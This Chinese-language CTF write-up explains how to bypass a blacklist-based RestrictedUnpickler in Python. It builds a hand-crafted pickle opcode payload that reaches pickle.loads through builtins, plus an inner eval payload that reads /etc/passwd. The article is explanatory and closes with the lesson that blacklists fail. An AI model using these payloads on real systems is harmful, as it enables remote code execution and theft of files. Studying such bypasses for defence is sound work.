绕过 RestrictedUnpickler

上周跑模型的间隙,看到一个关于 Python Pickle 反序列化的 CTF 题,和以往见到的不太一样,感觉很有意思,遂打算研究一下。

0x00 Pickle 反序列化

我们知道,当我们控制了如 `pickle.loads`等序列化数据的输入接口时,我们可以通过构造恶意的 Payload 来达到任意代码执行的效果。这是因为, `pickle` 库在反序列化(unpickling)的过程中,默认会导入 Payload 中找到的任意类或者函数对象。所以,Python 的开发者也一直警告大家,不要轻易用 `pickle` 来反序列化没有经过数据清洗的输入数据。同时,还推荐开发者通过实现自己的 `Unpickler`,来限制反序列化过程中能够 import 的类或函数,参考:https://docs.python.org/3.7/library/pickle.html#restricting-globals

0x01 RestrictedUnpickler

回到题目中。题目中 pickle “沙箱” 的大致逻辑如下:

import pickle
import io
import builtins

class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))

def restricted_loads(s):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(s)).load()

可以看到,这个题是基于 Python 文档中的 example 来修改的,通过添加“黑名单”的方式来限制 unpickling 过程中的可导入类: 基本上禁用了 builtins 中的所有能直接执行代码的内置函数,同时还限制了导入类或者函数所在的模块必须是 `builtins`。可是,如果不通过这些内置函数,我们就不能执行代码了么?

翻翻文档,快速扫一眼 Python 的内置函数:

除去被禁用的函数,一眼看去还能凑合使用的是 `map` 和 `filter` 这两个接受函数做参数的内置函数。

在尝试了多次之后发现,即使我们能传入函数参数,我们也只能执行 builtins 中仅有的几个函数,并不能执行任意代码。就在纠结万分的时候,我猛然发现,还有一个被忽略的点, 那就是上下文早已导入的 `pickle` 模块。我们是否可以想办法调用 `pickle.loads`呢?这样不就直接绕过了原有的“沙箱” ?

0x02 Pickle Protocol

查看一下 pickle 序列化协议,当前环境下使用的是 Python3,所以我们来看看当前的 Protocol 3:

import pickletools
import prettytable

opcode_table = prettytable.PrettyTable()
opcode_table.field_names = ['Name', 'Code', 'Docs']
for opcode in pickletools.opcodes:
    opcode_table.add_row([opcode.name, opcode.code, opcode.doc.splitlines()[0]])
    
print(opcode_table)

输出 `opcode` 表:

+------------------+------+-----------------------------------------------------------------+
|       Name       | Code |                               Docs                              |
+------------------+------+-----------------------------------------------------------------+
|       INT        |  I   |                     Push an integer or bool.                    |
|      BININT      |  J   |                 Push a four-byte signed integer.                |
|     BININT1      |  K   |                Push a one-byte unsigned integer.                |
|     BININT2      |  M   |                Push a two-byte unsigned integer.                |
|       LONG       |  L   |                       Push a long integer.                      |
|      LONG1       | \x8a |               Long integer using one-byte length.               |
|      LONG4       | \x8b |              Long integer using found-byte length.              |
|      STRING      |  S   |                   Push a Python string object.                  |
| SHORT_BINSTRING  |  U   |                   Push a Python string object.                  |
|     BINBYTES     |  B   |                   Push a Python bytes object.                   |
|  SHORT_BINBYTES  |  C   |                   Push a Python bytes object.                   |
|    BINBYTES8     | \x8e |                   Push a Python bytes object.                   |
|       NONE       |  N   |                     Push None on the stack.                     |
|     NEWTRUE      | \x88 |                    Push True onto the stack.                    |
|     NEWFALSE     | \x89 |                    Push False onto the stack.                   |
|     UNICODE      |  V   |               Push a Python Unicode string object.              |
| SHORT_BINUNICODE | \x8c |               Push a Python Unicode string object.              |
|    BINUNICODE    |  X   |               Push a Python Unicode string object.              |
|   BINUNICODE8    | \x8d |               Push a Python Unicode string object.              |
|      FLOAT       |  F   |            Newline-terminated decimal float literal.            |
|     BINFLOAT     |  G   |        Float stored in binary form, with 8 bytes of data.       |
|    EMPTY_LIST    |  ]   |                       Push an empty list.                       |
|      APPEND      |  a   |                   Append an object to a list.                   |
|     APPENDS      |  e   |            Extend a list by a slice of stack objects.           |
|       LIST       |  l   |  Build a list out of the topmost stack slice, after markobject. |
|   EMPTY_TUPLE    |  )   |                       Push an empty tuple.                      |
|      TUPLE       |  t   | Build a tuple out of the topmost stack slice, after markobject. |
|      TUPLE1      | \x85 |     Build a one-tuple out of the topmost item on the stack.     |
|      TUPLE2      | \x86 |     Build a two-tuple out of the top two items on the stack.    |
|      TUPLE3      | \x87 |   Build a three-tuple out of the top three items on the stack.  |
|    EMPTY_DICT    |  }   |                       Push an empty dict.                       |
|       DICT       |  d   |  Build a dict out of the topmost stack slice, after markobject. |
|     SETITEM      |  s   |            Add a key+value pair to an existing dict.            |
|     SETITEMS     |  u   | Add an arbitrary number of key+value pairs to an existing dict. |
|    EMPTY_SET     | \x8f |                        Push an empty set.                       |
|     ADDITEMS     | \x90 |       Add an arbitrary number of items to an existing set.      |
|    FROZENSET     | \x91 |  Build a frozenset out of the topmost slice, after markobject.  |
|       POP        |  0   |   Discard the top stack item, shrinking the stack by one item.  |
|       DUP        |  2   |  Push the top stack item onto the stack again, duplicating it.  |
|       MARK       |  (   |                 Push markobject onto the stack.                 |
|     POP_MARK     |  1   |  Pop all the stack objects at and above the topmost markobject. |
|       GET        |  g   |      Read an object from the memo and push it on the stack.     |
|      BINGET      |  h   |      Read an object from the memo and push it on the stack.     |
|   LONG_BINGET    |  j   |      Read an object from the memo and push it on the stack.     |
|       PUT        |  p   |   Store the stack top into the memo.  The stack is not popped.  |
|      BINPUT      |  q   |   Store the stack top into the memo.  The stack is not popped.  |
|   LONG_BINPUT    |  r   |   Store the stack top into the memo.  The stack is not popped.  |
|     MEMOIZE      | \x94 |   Store the stack top into the memo.  The stack is not popped.  |
|       EXT1       | \x82 |                         Extension code.                         |
|       EXT2       | \x83 |                         Extension code.                         |
|       EXT4       | \x84 |                         Extension code.                         |
|      GLOBAL      |  c   |         Push a global object (module.attr) on the stack.        |
|   STACK_GLOBAL   | \x93 |         Push a global object (module.attr) on the stack.        |
|      REDUCE      |  R   |   Push an object built from a callable and an argument tuple.   |
|      BUILD       |  b   |   Finish building an object, via __setstate__ or dict update.   |
|       INST       |  i   |                     Build a class instance.                     |
|       OBJ        |  o   |                     Build a class instance.                     |
|      NEWOBJ      | \x81 |                    Build an object instance.                    |
|    NEWOBJ_EX     | \x92 |                    Build an object instance.                    |
|      PROTO       | \x80 |                   Protocol version indicator.                   |
|       STOP       |  .   |                   Stop the unpickling machine.                  |
|      FRAME       | \x95 |              Indicate the beginning of a new frame.             |
|      PERSID      |  P   |          Push an object identified by a persistent ID.          |
|    BINPERSID     |  Q   |          Push an object identified by a persistent ID.          |
+------------------+------+-----------------------------------------------------------------

对照此表,我们来看一个例子:

class Payloads(object):
    def __reduce__(self):
        return (eval, ("print(1)", ))

payload = pickle.dumps(Payloads())
print(payload)
print(dis(payload))

输出如下:

b'\x80\x03cbuiltins\neval\nq\x00X\x08\x00\x00\x00print(1)q\x01\x85q\x02Rq\x03.'
    0: \x80 PROTO      3                  <= 协议版本号 3
    2: c    GLOBAL     'builtins eval'
   17: q    BINPUT     0
   19: X    BINUNICODE 'print(1)'         <= length=\x08\x00\x00\x00
   32: q    BINPUT     1
   34: \x85 TUPLE1
   35: q    BINPUT     2
   37: R    REDUCE                        <= 构建一个函数调用
   38: q    BINPUT     3
   40: .    STOP

 

通过以上例子,我们使用 builtins 仅有的几个函数来构造一个间接调用 `pickle.loads` 的 Payload:

list(map(getattr(getattr(dict ,'get')(globals(), 'pickle'), 'loads'), ('PAYLOAD',)))

构造的 `opcode` 如下:

payload = b'\x80\x03'
payload += b'cbuiltins\nlist\nq\x00'       # list
payload += b'cbuiltins\nfilter\nq\x01'     # filter
payload += b'cbuiltins\ngetattr\nq\x02'    # getattr
payload += b'cbuiltins\ngetattr\nq\x03'    # getattr
payload += b'cbuiltins\ndict\nq\x04'       # dict
payload += b'X\x03\x00\x00\x00getq\x05'    # 'get'
payload += b'\x86q\x06'                    # (dict, 'get')
payload += b'Rq\x07'                       # RUN getattr(dict, 'get')
payload += b'cbuiltins\nglobals\nq\x08'    # globals
payload += b')q\x09'                       # ()
payload += b'Rq\x0a'                       # RUN globals()
payload += b'X\x06\x00\x00\x00pickleq\x0b' # 'pickle'
payload += b'\x86q\x0c'                    # (globals(), 'pickle')
payload += b'Rq\x0d'                       # get(globals(), 'pickle')
payload += b'X\x05\x00\x00\x00loadsq\x0e'  # ‘loads'
payload += b'\x86q\x0f'                    # (pickle, 'loads')
payload += b'Rq\x10'                       # getattr(pickle, 'loads)
payload += b'B'
payload += (len(inner_payload)).to_bytes(4, byteorder='little')
payload += inner_payload
payload += b'\x85q\x11'   # (inner_payloads,)
payload += b'\x86q\x12'   # (loads, (inner_payload,))
payload += b'Rq\x13'      # map(loads, (inner_payload,))
payload += b'\x85q\x14'   # TUPLE1
payload += b'Rq\x15'      # RUN list(...)
payload += b'.'

我们先构造一个内嵌的 payload:

import pickle

class InnerPayload(object):
    def __reduce__(self):
        return (
            eval, ("print(open('/etc/passwd').read())",)
        )

inner_payload = pickle.dumps(InnerPayload())
print(inner_payload)

# b"\x80\x03cbuiltins\neval\nq\x00X!\x00\x00\x00print(open('/etc/passwd').read())q\x01\x85q\x02Rq\x03."

 

结合两个 payload,我们来试一试:

可以看到,我们的 Payload 成功执行并读取了`/etc/passwd`。同时也可以看到,`find_class` 导入的函数全部满足条件:`getattr`、`list`、`filter`、`globals`、`dict`。

0x03 小结

当前只能想到这样一种绕过,不知道是否还有其他的方式,只能坐等 dalao 们放 writeup了。虽然直接构造`opcode`难度不是很大,但是一个不小心也导致调试过程中好几次栈没有平衡。

以此也可以看出,在`pickle`反序列化过程中只禁用危险函数也是不够的,还是得谨慎使用该接口。

0x04 References

1. https://github.com/phith0n/code-breaking/blob/master/2018/picklecode/web/core/serializer.py
2. https://docs.python.org/3.7/library/pickle.html#restricting-globals

Spread the word. Share this post!

Meet The Author

Leave Comment